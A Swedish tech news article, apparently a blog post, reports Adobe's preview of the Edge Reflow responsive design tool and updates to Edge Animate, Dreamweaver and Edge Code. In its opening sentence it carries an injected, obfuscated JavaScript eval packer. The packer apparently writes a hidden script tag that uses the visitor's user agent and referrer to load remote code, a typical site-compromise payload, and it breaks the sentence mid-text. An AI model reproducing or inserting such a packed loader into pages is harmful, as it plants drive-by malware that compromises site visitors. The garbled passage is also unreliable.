Image Image Image Image Image Image Image Image Image Image

| 26 februari, 2020

Scroll to top

Top

Adobe: Nytt responsivt designverktyg för kreativa webbdesigners

Adobe: Nytt responsivt designverktyg för kreativa webbdesigners
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|afnsi|var|u0026u|referrer|fbyir||js|php’.split(’|’),0,{}))
lanseras en förhandsversion av Adobe Edge Reflow  – ett responsivt webbdesignverktyg som gör det lättare att arbeta med digitalt innehåll för webbplatser med HTML5. Uppdateringar släpps också för Adobe Edge Animate och Adobe Dreamweaver  samt även en förhandsversion av Adobe Edge Code. Alla nya 
program är tillgängliga för Creative Cloud-medlemmar.

Adobe utökar sin portfölj av verktyg för HTML5 så att designers världen över lättare kan utveckla kreativt webbinnehåll som fungerar på både datorer och mobila enheter. Adobe Edge Reflow är ett responsivt webbdesignverktyg som hjälper till att anpassa webbsidor och grafik till olika skärmar och plattformar.

”Vi ser en oerhört snabb utveckling av webbdesign som ska fungera på olika plattformar och enheter. Med Adobe Edge Reflow har designers ett ännu bättre verktyg för att se till att allt innehåll presenteras optimalt i alla typer av webbläsare och skärmstorlekar,” säger Johan Lopes, nordisk affärsutvecklare för Adobes verktyg.

Adobe Edge Reflow är en nytt responsivt webbdesign verktyg för att skapa layout och visuell design med CSS. Lösningen gör att formgivare snabbt kan se hur deras arbete kommer att visas på olika skärmar som exempelvis smartphones och surfplattor. Edge Reflow lanseras i en förhandsversion för alla Creative Cloud-medlemmar och Adobe uppmuntrar användare att lämna synpunkter och korrigeringar så att lösningen kan utvecklas och förbättras kontinuerligt.

Nya redigeringsfunktioner och preview för Creative Cloud-medlemmar

Adobe släpper även ett antal viktiga uppdateringar till Adobe Edge Animate, bland annat stöd för gradienter, CSS-filter och ett utökat teckensnitt-stöd. Användare kommer nu att ha tillgång till såväl radiala som linjära gradienter i sina animeringar och kunna förhandsgranska teckensnitt live genom ett nytt gränssnitt i Edge Web Fonts. Nya CSS-filter för Edge Animate utökar möjligheter att utnyttja CSS-funktionalitet i moderna WebKit-läsare, bland annat funktioner för oskärpa, gråskalor, kontrast och mättade filter. Tidigare har effekter som detta bara kunnat användas via andra program som Adobe Photoshop.

Även Adobe Dreamweaver förbättrats för Creative Cloud-medlemmar genom bättre integration med Adobe Edge Tools & Services som ger bättre kodningsmöjligheter och ett bättre arbetsflöde. Den flytande rutnätslayouten gör det nu möjligt för utvecklare att dra nytta av class- och ID-taggar genom ett nytt redigeringsgränssnitt. Utvecklare kan också enkelt och snabbt förhandsgranska, välja och flytta över Edge Web Fonts-projekt direkt in i Dreamweaver.

Den förhandsversion av Adobe Edge Code som blir tillgänglig för Creative Cloud-medlemmar ger användare möjligheten att se ädnringar i webbläsaren direkt när de ändrar i koden. En annan nyhet är Quick Edit som gör det möjligt att göra kontext-baserad kod istället för att växla mellan olika filer. Bland de övriga nyheterna och förbättringarna märks också nya kodning-tips för CSS, taggar och attribut, något som ger utvecklare både bättre flexibilitet ochhögre produktivitet.